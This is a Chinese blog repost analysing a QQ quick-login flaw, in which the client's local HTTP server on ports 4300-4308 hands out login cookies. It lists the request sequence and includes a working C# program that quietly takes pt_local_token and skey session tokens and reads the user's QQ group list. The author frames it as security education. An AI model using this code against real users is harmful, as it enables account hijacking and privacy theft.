MyException - 我的异常网
当前位置:我的异常网» Web前端 » web保险:QQ号快速登录漏洞及被盗原理

web保险:QQ号快速登录漏洞及被盗原理

www.MyException.Cn  网友分享于:2013-09-19  浏览:0次
web安全:QQ号快速登录漏洞及被盗原理

为什么你什么都没干,但QQ空间中却发了很多小广告?也许你的QQ账号已经被盗。本文将讲解一个QQ的快速登录的漏洞。

我前阵子在论坛上看到一个QQ的快速登录的漏洞,觉得非常不错,所以把部分原文给转到园子来。

而利用这个漏洞最终可以实现,只要你点击一个页面或运行过一个程序,那么我就可以拥有你的登录权限。可以直接进你邮箱,进你微云,进你QQ空间等....

 

看懂本篇需要一点点web安全的基础,请移步我的上篇

web安全:通俗易懂,以实例讲述破解网站的原理及如何进行防护!如何让网站变得更安全。

  http://www.cnblogs.com/1996V/p/7458377.html

 

 

众所周知,Tencent以前使用Activex的方式实施QQ快速登录,在一个陌生浏览器上使用,第一件事就是安装QuickLogin控件。

Activex是插件的意思,比如如果有这个的话,你可以通过浏览器打开一个文档之类。而QuickLogin就是腾讯用来快速登录的Activex。

就在不知道什么时候,快速登录突然不用控件了。

当时很疑惑,Tencent用了什么奇葩的方法做到Web和本地的应用程序交互呢?

在没有插件的情况下,Web页面应该无法直接和本地的应用程序直接交互(除非定义协议,但也只能调起,不能获取程序提供的结果)。
在机缘巧合下(好吧就是闲着无聊看任务管理器发现了本机的httpd,发现Apache在运行的时候)突然意识到了一种可能:如果QQ在本地开了个端口,做了个Web服务器,也就是符合HTTP协议的TCP服务端,然后网页ajax向那个QQ(此时作为Web服务器)发起请求,是不是就可以获得结果呢。

httpd是是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。

结果真的就是这样,



网页JS向http://localhost.ptlogin2.qq.com(端口从4300-4308,一个个试试到成功)发起GET一个请求
ping一下就会发现是127.0.0.1,一查端口,确实是QQ在用。

第一个请求:/pt_get_uins?callback=ptui_getuins_CB&r=0.5919004196050326&pt_local_tk=399224727
pt_local_tk 来自cookie,管他是什么东西;r就是个随机数

返回的结果是个JSON数组:
var var_sso_uin_list=[{"account":"登录的QQ账号","face_index":-1,"gender":0,"nickname":"你的QQ昵称","uin":"还是你的QQ账号","client_type":66818,"uin_flag":8388612}];ptui_getuins_CB(var_sso_uin_list);

然后用http://ptlogin2.qq.com/getface来获取QQ头像,这里不做讨论

这样你的QQ信息就能显示在Web页面上了。

当你按下你的头像(选择这个登录的时候)

下列请求产生:
http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=你的QQ号&callback=ptui_getst_CB&r=0.7293395590126179&pt_local_tk=399224727
同样的,r是随机数,pt_local_tk是来自cookie,local_token
这个请求做什么事情呢?


嗯,Set-Cookie。


然后继续请求
http://ptlogin2.qq.com/jump?clientuin=你的QQ号&keyindex=19&pt_aid=549000912&daid=5&u1=http%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone&pt_local_tk=1881902769&pt_3rd_aid=0&ptopt=1&style=40
这里唯一的u1就是目标地址

这个请求将返回所有需要的cookie,至此你就登录成功了。

这些Cookie就相当于令牌,有了这个令牌就可以拥有快速登录的权限,就相当于你登录一般的网站,账号密码进去,后台会给浏览器注册一条Token来做状态验证一样。

也就是说,拿到了Cookie,你就可以通过CSRF(跨站伪装)的形式,来搞好多事情。

可以在网站上放一个页面,里面跑http请求,或者搞个窗体,里面也跑http请求。

只要你电脑上登录了QQ,只要你打开了这个页面或者打开了这个窗体,那么你的账号就已经被入侵!

不需要输入账号密码,可以直接拿着QQ空间发表留言的接口直接调用,可以直接爬虫抓相册图片,可以进微云等等等等。

 

 

 

我再放个 论坛上的一个人根据这个漏洞进行的实例,

他做的是QQ群的一个验证的实例

思路是:访问任意QQ网站登录都会在本地产生Cookie,

然后获取这个Cookie中的pt_local_token

进而获取一切。

public static bool VerifyQQGroupYesNo(string VerifyQQGroupNum)
{
            /// <summary>
            /// QQ群授权验证YesNo
            /// </summary>
            bool YesNo = false;
            ///随机数处理
            Random random = new Random();
            string randomstr = (Convert.ToDouble(random.Next(1, 99)) / Math.PI / 100).ToString();
            try
            {
                ///定义string类型pt_local_tk 、localhost_str 
                string pt_local_tk = string.Empty, localhost_str = string.Empty;
 
                //QQ会员中心Url
                string LoginUrl = "http://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=8000201&style=20&s_url=http%3A%2F%2Fvip.qq.com%2Floginsuccess.html&maskOpacity=60&daid=18&target=self";
 
                //Get方式Http1.1访问QQ会员中心
                Zmoli775.HTTP.GetHttp1_1(LoginUrl);
 
                //获取访问QQ会员中心生成Cookies->pt_local_tk值
                pt_local_tk = HTTP.Cookies.GetCookies(new Uri("http://ptlogin2.qq.com"))["pt_local_token"].Value;
          
                /*
                https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.22949112393586502&pt_local_tk=-2027291081
                */
 
                //自动登录[1]->返回QQ号、client_type、QQ头像代码face_index、性别、QQ昵称、uin、uin_flag
                localhost_str = Zmoli775.HTTP.Get("https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&r=" + randomstr + "&pt_local_tk=" + pt_local_tk + "", LoginUrl);
   
                //正则截取返回JSON字符串
                if (!string.IsNullOrEmpty(localhost_str = Regex.Match(localhost_str, "(?i)(?<=var_sso_uin_list=).*?(?=;)").Value))
                {
                    JArray JArray = (JArray)JsonConvert.DeserializeObject(localhost_str);
 
                    for (int i = 0; i < JArray.Count; i++)
                    {
   
                        //自动登录[2]->var_sso_get_st_uin登录失败返回:ptui_qlogin_CB('-1', 'http://qun.qzone.qq.com/group', '登录失败,请稍后再试。*');
 
                        string var_sso_get_st_uin = Zmoli775.HTTP.Get("http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=" + JArray[i]["account"] + "&callback=ptui_getst_CB&r=" + randomstr + "&pt_local_tk=" + pt_local_tk + "", LoginUrl);
 
                        //登录目标地址
                        string LoginDestinationAddress = "https://ssl.ptlogin2.qq.com/jump?clientuin=" + JArray[i]["account"] + "&keyindex=9&pt_aid=549000912&daid=5&u1=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&pt_local_tk=" + pt_local_tk + "&pt_3rd_aid=0&ptopt=1&style=40";
  
                        //登录目标地址Referer
                        string LoginDestinationAddressReferer = "https://ui.ptlogin2.qq.com/cgi-bin/login?appid=549000912&daid=5&style=12&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup";
 
                        //LoginOK登录成功返回访问地址生成关键Cookies
                        string LoginOK = Zmoli775.HTTP.Get(LoginDestinationAddress, LoginDestinationAddressReferer);
                         
                        //正则截取Url
                        string skey = Regex.Match(LoginOK, "(?i)(?<=ptui_qlogin_CB\\('0', ').*?(?=',)").Value;
                    
                        if (!string.IsNullOrEmpty(skey))
                        {
                            //Get方式Http1.1访问截取Url
                            Zmoli775.HTTP.GetHttp1_1(skey);
                        }
                        ///获取QQ群页面产生的Cookies->skey
                        skey = HTTP.Cookies.GetCookies(new Uri("http://ptlogin2.qzone.qq.com"))["skey"].Value;
     
                        if (!string.IsNullOrEmpty(skey))///判断Cookies->skey
                        {
                            string QQGroupList = string.Empty, QQGroupListJson = string.Empty;
                            QQGroupList = Zmoli775.HTTP.Get("http://qun.qzone.qq.com/cgi-bin/get_group_list?uin=" + JArray[i]["account"] + "&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F50.0.2661.102%20Safari%2F537.36&random=" + randomstr + "&g_tk=" + Convert.ToString(Zmoli775.HTTP.Getg_tk(skey)) + "", LoginDestinationAddressReferer);
                             
                            //正则取QQ群列表信息
                            QQGroupListJson = Regex.Match(QQGroupList, "(?i)(?<=_Callback\\().*?(?=\\);)").Value;
                  
                            if (!string.IsNullOrEmpty(QQGroupListJson))
                            {
                                JArray Jarray = (JArray)JsonConvert.DeserializeObject(Convert.ToString(((JObject)JsonConvert.DeserializeObject(QQGroupListJson))["data"]["group"]));
                                JArray JA = (JArray)JsonConvert.DeserializeObject(Convert.ToString(Jarray));
                                for (int y = 0; y < JA.Count; y++)
                                {
                                    if (JA[y]["groupid"].ToString() == VerifyQQGroupNum) YesNo = true;///如果获取到的QQ群号码和需要验证的QQ群号码一致则设置YesNo 值为true
                                }
                            }
                        }
                    }
                }
                if (YesNo)//如果值为true
                {
                    MessageBox.Show("QQ群验证成功!", "软件授权提示!", MessageBoxButtons.OK, MessageBoxIcon.Information);
                    return true;
                }
                else
                {
                    MessageBox.Show("QQ群验证失败!", "软件授权提示!", MessageBoxButtons.OK, MessageBoxIcon.Error);
                    return false;
                }
            }
            catch (Exception)
            {
                MessageBox.Show("QQ群验证失败!", "软件授权提示!", MessageBoxButtons.OK, MessageBoxIcon.Error);
                return false;
            }
}



 
作者:小曾
出处:http://www.cnblogs.com/1996V/p/7481823.html 欢迎转载,但任何转载必须保留完整文章,在显要地方显示署名以及原文链接。如您有任何疑问或者授权方面的协商,请给我留言
.Net交流群, QQ群:166843154 欲望与挣扎 

 

22楼土豆哥哥
感谢分享
21楼SupperMary
果然事出反常必有妖。,不过腾讯搞的这个挺有意思。
20楼InkFx
推荐+1
19楼lovejean
mark
18楼supperAdministrator
我说怎么前两天我的QQ老是自动弹出加某个QQ群!
17楼秦小阳么么哒
楼主离黑客不远了
Re: 小曾看世界
@秦小阳么么哒,我走的是架构这条路线,,正在努力
16楼明zai
我表示一头雾水 很有深度的分析
15楼ZYQ199110
厉害了,试了一下和楼主说的一样
14楼RookieMx
虽然我也是.net 但是这种做法,真的。。。。不耻
Re: 小曾看世界
@RookieMx,额。。赞同,但这只是写出了一种思路,主要目的还是提升自己的网站安全能力,所谓工欲善其事,必先利其器,以后你要是搞了个非常讲究安全性的网站,你不懂这点东西可不行。
13楼RageXZhan
楼主厉害,幸好我多年不上PC版的QQ了
12楼灵雨飘零
牛帮~~~~~~
11楼洪研
厉害了
10楼BabyCrazy
我弱弱的问一句。。不是本地的EXE如何从本地请求http?
Re: 小曾看世界
@BabyCrazy,老哥,,,,你得多补补这些.net的知识点啊
9楼h82258652
竟然是本地监听,第一次知道,之前还以为是网页发送到服务器,然后服务器再发命令给客户端。
8楼troy.cui
那么牛逼
7楼小小高
原文地址:,https://www.52pojie.cn/thread-591949-1-1.html
Re: Wackysoft
@小小高,博主应该是借鉴了原文,然后用C#写了代码,我看原文用的O-C
6楼ltcszk
看原文有refer校验,也就是说web端的攻击无效?,那不就等同于中木马后QQ号会被盗
Re: 小曾看世界
@ltcszk,所有web端的东西,都可以通过后台手写一个http流去实现,所以无论refer还是其它的,都可以更改的。
5楼九羽
给大神疯狂打call
Re: 小曾看世界
@九羽,谢谢
4楼师傅的八戒
NB
3楼红领巾i
ActiveX的限制性大,不用ActiveX数据不安全,腾讯也很无奈啊
2楼fvij4491
楼主太牛逼了
1楼BabyCrazy
必须本地执行 不可以用ajax跨域获取sig。

文章评论

5款最佳正则表达式编辑调试器
5款最佳正则表达式编辑调试器
程序猿的崛起——Growth Hacker
程序猿的崛起——Growth Hacker
程序员都该阅读的书
程序员都该阅读的书
旅行,写作,编程
旅行,写作,编程
程序员最害怕的5件事 你中招了吗?
程序员最害怕的5件事 你中招了吗?
当下全球最炙手可热的八位少年创业者
当下全球最炙手可热的八位少年创业者
 程序员的样子
程序员的样子
要嫁就嫁程序猿—钱多话少死的早
要嫁就嫁程序猿—钱多话少死的早
科技史上最臭名昭著的13大罪犯
科技史上最臭名昭著的13大罪犯
老程序员的下场
老程序员的下场
程序员眼里IE浏览器是什么样的
程序员眼里IE浏览器是什么样的
“肮脏的”IT工作排行榜
“肮脏的”IT工作排行榜
总结2014中国互联网十大段子
总结2014中国互联网十大段子
为什么程序员都是夜猫子
为什么程序员都是夜猫子
我是如何打败拖延症的
我是如何打败拖延症的
程序员的鄙视链
程序员的鄙视链
程序员应该关注的一些事儿
程序员应该关注的一些事儿
十大编程算法助程序员走上高手之路
十大编程算法助程序员走上高手之路
漫画:程序员的工作
漫画:程序员的工作
团队中“技术大拿”并非越多越好
团队中“技术大拿”并非越多越好
那些争议最大的编程观点
那些争议最大的编程观点
我的丈夫是个程序员
我的丈夫是个程序员
聊聊HTTPS和SSL/TLS协议
聊聊HTTPS和SSL/TLS协议
程序员周末都喜欢做什么?
程序员周末都喜欢做什么?
如何区分一个程序员是“老手“还是“新手“?
如何区分一个程序员是“老手“还是“新手“?
程序员必看的十大电影
程序员必看的十大电影
Web开发者需具备的8个好习惯
Web开发者需具备的8个好习惯
代码女神横空出世
代码女神横空出世
亲爱的项目经理,我恨你
亲爱的项目经理,我恨你
程序员的一天:一寸光阴一寸金
程序员的一天:一寸光阴一寸金
中美印日四国程序员比较
中美印日四国程序员比较
老美怎么看待阿里赴美上市
老美怎么看待阿里赴美上市
什么才是优秀的用户界面设计
什么才是优秀的用户界面设计
初级 vs 高级开发者 哪个性价比更高?
初级 vs 高级开发者 哪个性价比更高?
Java 与 .NET 的平台发展之争
Java 与 .NET 的平台发展之争
如何成为一名黑客
如何成为一名黑客
60个开发者不容错过的免费资源库
60个开发者不容错过的免费资源库
写给自己也写给你 自己到底该何去何从
写给自己也写给你 自己到底该何去何从
鲜为人知的编程真相
鲜为人知的编程真相
做程序猿的老婆应该注意的一些事情
做程序猿的老婆应该注意的一些事情
不懂技术不要对懂技术的人说这很容易实现
不懂技术不要对懂技术的人说这很容易实现
2013年中国软件开发者薪资调查报告
2013年中国软件开发者薪资调查报告
看13位CEO、创始人和高管如何提高工作效率
看13位CEO、创始人和高管如何提高工作效率
Web开发人员为什么越来越懒了?
Web开发人员为什么越来越懒了?
10个帮程序员减压放松的网站
10个帮程序员减压放松的网站
一个程序员的时间管理
一个程序员的时间管理
我跳槽是因为他们的显示器更大
我跳槽是因为他们的显示器更大
“懒”出效率是程序员的美德
“懒”出效率是程序员的美德
编程语言是女人
编程语言是女人
软件开发程序错误异常ExceptionCopyright © 2009-2015 MyException 版权所有